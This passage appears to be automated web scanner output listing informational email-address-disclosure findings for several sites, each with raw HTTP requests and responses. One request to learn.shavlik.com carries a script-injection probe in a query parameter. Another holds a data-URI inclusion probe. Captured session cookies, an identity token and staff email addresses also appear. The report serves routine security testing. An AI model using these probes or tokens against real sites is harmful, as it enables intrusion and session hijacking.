Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: siteuidut=1dad4e31be764ea7b431d43fbac2942b; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=85202318.1300554584.2.2.utmcsr=help.smartertools.com|utmccn=(referral)|utmcmd=referral|utmcct=/SmarterMail/v8/Topics/Default.aspx; __utma=134836083.1670938407.1300551915.1300551915.1300554519.2; CommunityServer-LastVisitUpdated-2570=; CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:43:12 GMT; __utma=85202318.1655160661.1300151775.1300736103.1301157836.5; __utmc=85202318; __utmb=85202318.2.10.1301157836

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.31113.47
Set-Cookie: CommunityServer-UserCookie2570=lv=Mon, 21 Mar 2011 12:41:16 GMT&mra=Sat, 26 Mar 2011 09:43:16 GMT; expires=Sun, 25-Mar-2012 16:43:17 GMT; path=/
Set-Cookie: CSAnonymous=144f9286-e92e-4b17-84c2-481ab0762dbb; expires=Sat, 26-Mar-2011 17:03:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:43:17 GMT
Content-Length: 21107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="mailto:info@my-happyfeet.com">info@my-happyfeet.com</a>
...[SNIP]...
23.5. http://gfc.com/business-consulting.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gfc.com
Path:   /business-consulting.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /business-consulting.php HTTP/1.1
Host: gfc.com
Proxy-Connection: keep-alive
Referer: http://gfc.com/resources.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:17:06 GMT
Server: Apache
Content-Type: text/html
Content-Length: 16637

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Gal
...[SNIP]...
<a href="mailTo:saustin@gfc.com">
...[SNIP]...
<a href="mailTo:mbeliveau@gfc.com">
...[SNIP]...
<a href="mailTo:gbourgea@gfc.com">
...[SNIP]...
<a href="mailTo:jdonohue@gfc.com">
...[SNIP]...
<a href="mailTo:jhamilton@gfc.com">
...[SNIP]...
<a href="mailTo:mkeller@gfc.com">
...[SNIP]...
<a href="mailTo:plapp@gfc.com">
...[SNIP]...
<a href="mailTo:rwolfish@gfc.com">
...[SNIP]...
<a href="mailTo:saustin@gfc.com">
...[SNIP]...
<a href="mailTo:mbeliveau@gfc.com">
...[SNIP]...
<a href="mailTo:gbourgea@gfc.com">
...[SNIP]...
<a href="mailTo:jdonohue@gfc.com">
...[SNIP]...
<a href="mailTo:jhamilton@gfc.com">
...[SNIP]...
<a href="mailTo:mkeller@gfc.com">
...[SNIP]...
<a href="mailTo:plapp@gfc.com">
...[SNIP]...
<a href="mailTo:rwolfish@gfc.com">
...[SNIP]...
23.6. http://gfc.com/information-technology.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gfc.com
Path:   /information-technology.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /information-technology.php HTTP/1.1
Host: gfc.com
Proxy-Connection: keep-alive
Referer: http://gfc.com/human-resource-services.php?page=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 00:35:26 GMT
Server: Apache
Content-Type: text/html
Content-Length: 15484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Gal
...[SNIP]...
<a href="mailTo:dgadway@gfc.com">
...[SNIP]...
<a href="mailTo:jpaolicelli@gfc.com">
...[SNIP]...
23.7. http://i2.technet.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i2.technet.microsoft.com
Path:   /Areas/Sto/Content/Scripts/mm/global.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Areas/Sto/Content/Scripts/mm/global.js HTTP/1.1
Host: i2.technet.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter:3=en-us/subscriptions/downloads; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; omniID=ue; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301090290290:ss=1301090290290; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=1296000
ntCoent-Length: 167246
Content-Type: application/javascript
Last-Modified: Mon, 14 Mar 2011 10:06:03 GMT
Accept-Ranges: bytes
ETag: "ce4646d2fe2cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 167246
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:39:59 GMT
Connection: close

.../* * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js
...[SNIP]...
$4)#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t;s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^A;s
...[SNIP]...
23.8. http://i2.technet.microsoft.com/platform/Controls/Omniture/resources/TechNet/omni_rsid_technet-bn20110314.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i2.technet.microsoft.com
Path:   /platform/Controls/Omniture/resources/TechNet/omni_rsid_technet-bn20110314.js

Issue detail

The following email address was disclosed in the response:

Request

GET /platform/Controls/Omniture/resources/TechNet/omni_rsid_technet-bn20110314.js HTTP/1.1
Host: i2.technet.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg703766.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi600017030E02h7030E; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter:3=en-us/subscriptions/downloads; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; omniID=ue; s_cc=true; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092848759:ss=1301092848759; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=15552000
Expires: Wed, 21 Sep 2011 14:16:03 GMT
Last-Modified: Mon, 14 Mar 2011 10:23:04 GMT
ETag: -617528035
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Type: text/javascript
ntCoent-Length: 66821
Content-Length: 66821
Vary: Accept-Encoding
Date: Sat, 26 Mar 2011 01:40:25 GMT
Connection: close


var _om_gbls={omniGuidPath:"",version:"110321",tmp:"",s_account:"",market:"",app:"",center:"",library:"",subdom:"",catpath:"",site:"",wtspparam:"",host:"",path:"",href:"",extraRsids:"",extraRsidsA
...[SNIP]...
#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^
...[SNIP]...
23.9. http://learn.shavlik.com/shavlik/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/

Issue detail

The following email address was disclosed in the response:

Request

GET /shavlik/ HTTP/1.1
Host: learn.shavlik.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 20:58:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                       
...[SNIP]...
<a href="mailto:sales@shavlik.com" >sales@shavlik.com</a>
...[SNIP]...
23.10. http://learn.shavlik.com/shavlik/download.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/download.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /shavlik/download.cfm?nFileID=0&pg=697 HTTP/1.1
Host: learn.shavlik.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 20:58:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                   
...[SNIP]...
<div id=footer>Shavlik Technologies, LLC | Privacy Policy | Direct: (800) 690-6911, (651) 426-6624; Fax: (651) 426-3345; Support: (866) 407-5279; Email: sales@shavlik.com</div>
...[SNIP]...
23.11. http://learn.shavlik.com/shavlik/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /shavlik/index.cfm?m=1009&pg=697&h=02edf0--%3E%3Cscript%3Ealert(1)%3C/script%3Ee58fc9f9062&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 20:41:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<div id=footer>
                   Shavlik Technologies, LLC | Privacy Policy | Direct: (800) 690-6911, (651) 426-6624; Fax: (651) 426-3345; Support: (866) 407-5279; Email: sales@shavlik.com
               </div>
...[SNIP]...
23.12. http://microsoftcambridge.com/Events/tabid/57/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Events/tabid/57/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Events/tabid/57/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 125960
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:13 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.13. http://microsoftcambridge.com/People/tabid/56/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /People/tabid/56/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /People/tabid/56/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21822
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:10 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.14. http://microsoftcambridge.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Resources/Shared/scripts/DotNetNukeAjaxShared.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/DotNetNukeAjaxShared.js?_=1301103673639 HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 26 Mar 2011 01:40:27 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Last-Modified: Thu, 17 Feb 2011 20:35:54 GMT
Content-Length: 10101

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this softwar
...[SNIP]...
<history>
   ''' Version 1.0.0: Feb. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' Version 1.0.1: Oct. 28, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
   ''' </history>
...[SNIP]...
23.15. http://microsoftcambridge.com/Resources/Shared/scripts/widgets.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Resources/Shared/scripts/widgets.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Resources/Shared/scripts/widgets.js?_=1301103676368 HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 26 Mar 2011 01:40:29 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Last-Modified: Thu, 17 Feb 2011 20:36:04 GMT
Content-Length: 11495

/*
DotNetNuke. - http://www.dotnetnuke.com
Copyright (c) 2002-2010
by DotNetNuke Corporation

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and as
...[SNIP]...
<history>
''' Version 1.0.0: Oct. 16, 2007, Nik Kalyani, nik.kalyani@dotnetnuke.com
''' </history>
...[SNIP]...
23.16. http://microsoftcambridge.com/Teams/ApplicationVirtualization/tabid/83/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Teams/ApplicationVirtualization/tabid/83/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Teams/ApplicationVirtualization/tabid/83/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20900
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:45:35 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
<a href="mailto:nerdst@microsoft.com?subject=Site%20Blog%20Suggestions">
...[SNIP]...
23.17. http://microsoftcambridge.com/Teams/FuseLabs/tabid/82/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Teams/FuseLabs/tabid/82/Default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Teams/FuseLabs/tabid/82/Default.aspx HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20873
Content-Type: text/html; charset=utf-8
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Compressed-By: DotNetNuke-Compression
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:45:34 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-
...[SNIP]...
